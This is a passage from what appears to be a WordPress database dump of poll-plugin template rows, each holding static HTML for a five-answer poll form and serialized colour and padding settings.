type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#B70004";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(20, 'basic', 'Red V4', 'red-v4', '', '<div class="basic-yop-poll-container red-v4" style="padding-top: 12px;padding-bottom: 12px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#B70004";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(21, 'basic', 'Red V5', 'red-v5', '', '<div class="basic-yop-poll-container red-v5" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#B70004";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#B70004";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:3:"5px";s:16:"paddingTopBottom";s:4:"10px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(22, 'basic', 'Blue V1', 'blue-v1', '', '<div class="basic-yop-poll-container blue-v1" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#327BD6";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#327BD6";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(23, 'basic', 'Blue V2', 'blue-v2', '', '<div class="basic-yop-poll-container blue-v2">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#ffffff";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:230:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}\n								.basic-yop-poll-container[data-uid] .basic-question-title h5 {\n									background-color: #327BD6;\n									padding: 5px 0;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(24, 'basic', 'Blue V3', 'blue-v3', '', '<div class="basic-yop-poll-container blue-v3" style="padding-top: 12px;padding-bottom: 12px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#327BD6";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(25, 'basic', 'Blue V4', 'blue-v4', '', '<div class="basic-yop-poll-container blue-v4" style="padding-top: 12px;padding-bottom: 12px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#327BD6";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(26, 'basic', 'Blue V5', 'blue-v5', '', '<div class="basic-yop-poll-container blue-v5" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#327BD6";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#327BD6";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(27, 'basic-pretty', 'Square Black', 'square-black', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="black">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:5:"black";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
